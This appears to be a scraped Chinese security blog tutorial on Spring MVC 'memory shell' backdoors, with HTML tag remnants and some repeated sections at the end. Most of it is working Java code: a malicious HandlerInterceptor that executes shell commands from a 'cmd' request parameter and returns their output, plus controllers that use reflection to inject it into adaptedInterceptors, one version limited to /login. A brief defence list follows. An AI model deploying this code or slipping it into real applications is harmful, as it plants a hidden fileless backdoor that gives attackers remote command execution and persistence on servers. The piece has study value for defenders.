Spring Interceptor 内存马分析与实现<\/h1>

1. 基本概念<\/h2>
Spring Interceptor 内存马是一种基于 Spring MVC 拦截器机制的无文件攻击技术，它通过动态注册恶意拦截器来实现命令执行等功能，具有隐蔽性强、难以检测的特点。<\/p>

2. 基础拦截器实现<\/h2>

2.1 创建恶意拦截器<\/h3>

package<\/span> com.example.demo;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.HandlerInterceptor;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.ModelAndView;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> MyInterceptor<\/span> implements<\/span> HandlerInterceptor {<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> preHandle<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse res,<\/span> Object handler)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        if<\/span> (<\/span>req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            byte<\/span>[]<\/span> bytes =<\/span> new<\/span> byte<\/span>[<\/span>1024<\/span>];<\/span>
<\/span><\/span>            Process process =<\/span> new<\/span> ProcessBuilder(<\/span>"cmd"<\/span>,<\/span> "\/c"<\/span>,<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)).<\/span>start<\/span>();<\/span>
<\/span><\/span>            int<\/span> len =<\/span> process.<\/span>getInputStream<\/span>().<\/span>read<\/span>(<\/span>bytes);<\/span>
<\/span><\/span>            res.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>new<\/span> String(<\/span>bytes,<\/span> 0<\/span>,<\/span> len));<\/span>
<\/span><\/span>            process.<\/span>destroy<\/span>();<\/span>
<\/span><\/span>            return<\/span> false<\/span>;<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            return<\/span> true<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> void<\/span> postHandle<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> 
<\/span><\/span>                          Object handler,<\/span> ModelAndView modelAndView)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> void<\/span> afterCompletion<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> 
<\/span><\/span>                               Object handler,<\/span> Exception ex)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 注册拦截器<\/h3>
package<\/span> com.example.demo;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.springframework.context.annotation.Configuration;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.config.annotation.InterceptorRegistry;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.config.annotation.WebMvcConfigurer;<\/span>
<\/span><\/span>
<\/span><\/span>@Configuration<\/span>
<\/span><\/span>public<\/span> class<\/span> InterceptorConfig<\/span> implements<\/span> WebMvcConfigurer {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> addInterceptors<\/span>(<\/span>InterceptorRegistry registry)<\/span> {<\/span>
<\/span><\/span>        registry.<\/span>addInterceptor<\/span>(<\/span>new<\/span> MyInterceptor());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 拦截器调用流程分析<\/h2>


调用栈分析<\/strong>:<\/p>

DispatcherServlet#doDispatch<\/code> 调用 mappedHandler.applyPreHandle<\/code><\/li>
HandlerExecutionChain#applyPreHandle<\/code> 调用拦截器的 preHandle<\/code> 方法<\/li>
<\/ul>
<\/li>

关键对象获取<\/strong>:<\/p>

mappedHandler<\/code> 由 this.getHandler<\/code> 获取<\/li>
mapping<\/code> 是 requestMappingHandlerMapping<\/code> (一个 Spring bean)<\/li>
<\/ul>
<\/li>

拦截器链构建<\/strong>:<\/p>

AbstractHandlerMapping#getHandlerExecutionChain<\/code> 方法遍历 this.adaptedInterceptors<\/code><\/li>
如果是 MappedInterceptor<\/code> 会判断 URL 是否匹配<\/li>
否则直接加入 chain 中<\/li>
<\/ul>
<\/li>
<\/ol>
4. 内存马注入实现<\/h2>
4.1 基本注入方式<\/h3>
import<\/span> org.springframework.web.bind.annotation.GetMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RestController;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.WebApplicationContext;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.request.RequestContextHolder;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.request.ServletRequestAttributes;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.HandlerInterceptor;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.handler.AbstractHandlerMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.support.RequestContextUtils;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.ArrayList;<\/span>
<\/span><\/span>import<\/span> java.util.List;<\/span>
<\/span><\/span>
<\/span><\/span>@RestController<\/span>
<\/span><\/span>public<\/span> class<\/span> inject<\/span> {<\/span>
<\/span><\/span>    @GetMapping<\/span>(<\/span>"\/inject"<\/span>)<\/span>
<\/span><\/span>    public<\/span> void<\/span> inject<\/span>(){<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 获取context
<\/span><\/span><\/span><\/span>            WebApplicationContext context =<\/span> RequestContextUtils.<\/span>findWebApplicationContext<\/span>(<\/span>
<\/span><\/span>                ((<\/span>ServletRequestAttributes)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>());<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 获取AbstractHandlerMapping实例
<\/span><\/span><\/span><\/span>            AbstractHandlerMapping abstractHandlerMapping =<\/span> 
<\/span><\/span>                (<\/span>AbstractHandlerMapping)<\/span> context.<\/span>getBean<\/span>(<\/span>"requestMappingHandlerMapping"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 反射获取adaptedInterceptors字段
<\/span><\/span><\/span><\/span>            Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span>
<\/span><\/span>            field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            List<<\/span>HandlerInterceptor><\/span> adaptedInterceptors =<\/span> (<\/span>ArrayList)<\/span> field.<\/span>get<\/span>(<\/span>abstractHandlerMapping);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 实例化并注册恶意拦截器
<\/span><\/span><\/span><\/span>            MyInterceptor m =<\/span> new<\/span> MyInterceptor();<\/span>
<\/span><\/span>            adaptedInterceptors.<\/span>add<\/span>(<\/span>m);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 指定路径的注入方式<\/h3>
import<\/span> com.example.demo.MyInterceptor;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.GetMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.bind.annotation.RestController;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.WebApplicationContext;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.request.RequestContextHolder;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.context.request.ServletRequestAttributes;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.HandlerInterceptor;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.handler.AbstractHandlerMapping;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.handler.MappedInterceptor;<\/span>
<\/span><\/span>import<\/span> org.springframework.web.servlet.support.RequestContextUtils;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>import<\/span> java.util.ArrayList;<\/span>
<\/span><\/span>import<\/span> java.util.List;<\/span>
<\/span><\/span>
<\/span><\/span>@RestController<\/span>
<\/span><\/span>public<\/span> class<\/span> inject<\/span> {<\/span>
<\/span><\/span>    @GetMapping<\/span>(<\/span>"\/inject"<\/span>)<\/span>
<\/span><\/span>    public<\/span> void<\/span> inject<\/span>(){<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 获取context
<\/span><\/span><\/span><\/span>            WebApplicationContext context =<\/span> RequestContextUtils.<\/span>findWebApplicationContext<\/span>(<\/span>
<\/span><\/span>                ((<\/span>ServletRequestAttributes)<\/span> RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>());<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 获取AbstractHandlerMapping实例
<\/span><\/span><\/span><\/span>            AbstractHandlerMapping abstractHandlerMapping =<\/span> 
<\/span><\/span>                (<\/span>AbstractHandlerMapping)<\/span> context.<\/span>getBean<\/span>(<\/span>"requestMappingHandlerMapping"<\/span>);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 反射获取adaptedInterceptors字段
<\/span><\/span><\/span><\/span>            Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span>
<\/span><\/span>            field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            List<<\/span>HandlerInterceptor><\/span> adaptedInterceptors =<\/span> (<\/span>ArrayList)<\/span> field.<\/span>get<\/span>(<\/span>abstractHandlerMapping);<\/span>
<\/span><\/span>            
<\/span><\/span>            \/\/ 实例化恶意拦截器并创建MappedInterceptor
<\/span><\/span><\/span><\/span>            MyInterceptor m =<\/span> new<\/span> MyInterceptor();<\/span>
<\/span><\/span>            String[]<\/span> path =<\/span> new<\/span> String[]{<\/span>"\/login"<\/span>};<\/span>  \/\/ 指定路径
<\/span><\/span><\/span><\/span>            MappedInterceptor mi =<\/span> new<\/span> MappedInterceptor(<\/span>path,<\/span> null<\/span>,<\/span> m);<\/span>
<\/span><\/span>            
<\/span><\/span>            adaptedInterceptors.<\/span>add<\/span>(<\/span>mi);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 关键点说明<\/h2>


获取WebApplicationContext<\/strong>:<\/p>

通过 RequestContextUtils.findWebApplicationContext<\/code> 获取当前请求的上下文<\/li>
需要先获取 RequestContextHolder.currentRequestAttributes()<\/code><\/li>
<\/ul>
<\/li>

获取HandlerMapping<\/strong>:<\/p>

requestMappingHandlerMapping<\/code> 是 Spring MVC 的核心组件<\/li>
通过 context.getBean("requestMappingHandlerMapping")<\/code> 获取<\/li>
<\/ul>
<\/li>

拦截器存储位置<\/strong>:<\/p>

拦截器存储在 AbstractHandlerMapping<\/code> 的 adaptedInterceptors<\/code> 字段中<\/li>
需要通过反射访问这个私有字段<\/li>
<\/ul>
<\/li>

路径限制<\/strong>:<\/p>

使用 MappedInterceptor<\/code> 可以限制拦截器只在特定路径生效<\/li>
注意路径必须是存在的路由，否则不会触发<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防御建议<\/h2>

监控 AbstractHandlerMapping.adaptedInterceptors<\/code> 的修改<\/li>
限制反射操作，特别是对私有字段的访问<\/li>
检查应用中是否存在未知的拦截器<\/li>
实施严格的权限控制，防止未授权的代码执行<\/li>
<\/ol>
7. 总结<\/h2>
Spring Interceptor 内存马通过动态注册恶意拦截器实现持久化攻击，其核心在于利用 Spring MVC 的拦截器机制和反射技术。理解其实现原理对于防御此类攻击至关重要。<\/p>

Spring Interceptor 内存马分析与实现<\/h1>

1. 基本概念<\/h2> Spring Interceptor 内存马是一种基于 Spring MVC 拦截器机制的无文件攻击技术，它通过动态注册恶意拦截器来实现命令执行等功能，具有隐蔽性强、难以检测的特点。<\/p>

2. 基础拦截器实现<\/h2>

4. 内存马注入实现<\/h2>

7. 总结<\/h2> Spring Interceptor 内存马通过动态注册恶意拦截器实现持久化攻击，其核心在于利用 Spring MVC 的拦截器机制和反射技术。理解其实现原理对于防御此类攻击至关重要。<\/p>

1. 基本概念<\/h2>
Spring Interceptor 内存马是一种基于 Spring MVC 拦截器机制的无文件攻击技术，它通过动态注册恶意拦截器来实现命令执行等功能，具有隐蔽性强、难以检测的特点。<\/p>

7. 总结<\/h2>
Spring Interceptor 内存马通过动态注册恶意拦截器实现持久化攻击，其核心在于利用 Spring MVC 的拦截器机制和反射技术。理解其实现原理对于防御此类攻击至关重要。<\/p>